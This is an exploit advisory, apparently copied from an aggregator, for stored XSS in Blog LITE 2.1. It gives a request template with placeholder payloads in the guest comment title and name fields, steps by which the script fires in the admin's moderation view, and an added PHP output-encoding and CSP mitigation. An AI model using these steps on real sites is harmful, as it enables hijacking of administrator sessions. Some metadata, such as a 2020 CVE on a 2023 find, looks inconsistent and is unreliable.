Blog LITE 2.1 - Stored XSS

CVE              : CVE-2020-1803
Category         : CWE-79
Price            : $500
Severity         : High
Author           : Unknown
Risk             : Critical
Exploitation Type: Remote
Date             : 2023-06-19
CVSS             : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023060040

Below is a copy:

Blog LITE 2.1 - Stored XSS
Author   : CraCkEr
Website  : https://www.netartmedia.net/blog-lite
Vendor   : NetArt Media
Software : Blog LITE 2.1
Vuln Type: Stored XSS
Impact   : Manipulate the content of the site


Release Notes:

Allows an attacker to inject malicious code into the website,
giving the ability to steal sensitive information,
manipulate data, and launch additional attacks.


Greets:

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Stored XSS

---------------------------------------------------------
POST /blog/index.php HTTP/2


-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="title"

[XSS Payload]
-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="content"


-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="author"

[XSS Payload]
-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="email"


-----------------------------401019026540470155022776857270


## Steps to Reproduce:

1. Visit Any Category on the Blog
2. Write a comment (as Guest)
3. Inject your [XSS Payload] in "Comment Title"
4. Inject your [XSS Payload] in "Your Name"
5. Submit

6. By default, the blog disables your comment pending an admin check
7. The admin checks the [BLOG POSTS] in the Administration Panel at this path (https://website/blog/admin/index.php?page=posts)
8. The admin then checks the comments at this path (https://website/blog/admin/index.php?page=comments&id=2)
9. The XSS fires and executes in the admin's browser

[-] Done

 CraCkEr 2023
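
Mitigation for the flow above, as an added example that is not Blog LITE's source code and not part of the advisory: the stored "title" and "author" values are HTML-encoded when the admin comments page renders them, with a Content-Security-Policy header as a second layer. The function names, row layout and sample row are assumptions; only the field names come from the request shown above.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: encode untrusted text for an HTML element body
// or a quoted attribute value.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable pattern: stored guest input is concatenated into the admin
// page as-is, so any markup in "title" or "author" is parsed by the browser.
function renderCommentRowUnsafe(array $c): string
{
    return '<tr><td title="' . $c['author'] . '">' . $c['title'] . '</td>'
         . '<td>' . $c['author'] . '</td></tr>';
}

// Hardened pattern: every stored field is encoded at output time, in both
// the attribute and the element context.
function renderCommentRowSafe(array $c): string
{
    return '<tr><td title="' . e($c['author']) . '">' . e($c['title']) . '</td>'
         . '<td>' . e($c['author']) . '</td></tr>';
}

// Constructed sample row: harmless markup stands in for the advisory's
// [XSS Payload] placeholder.
$stored = [
    'title'  => '<b>marker</b>',
    'author' => '"><i>guest</i>',
];

// Defense in depth for the admin panel: disallow inline and third-party
// scripts. Must be sent before any output.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'");

// Unsafe row: the sample markup is emitted unchanged.
echo renderCommentRowUnsafe($stored), PHP_EOL;

// Safe row: <, >, " and ' are emitted as entities, so the browser shows
// the stored values as text instead of parsing them.
echo renderCommentRowSafe($stored), PHP_EOL;
```

Encoding belongs at every place the comment fields are rendered, including the public post page once a comment is approved, not only in the admin view.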
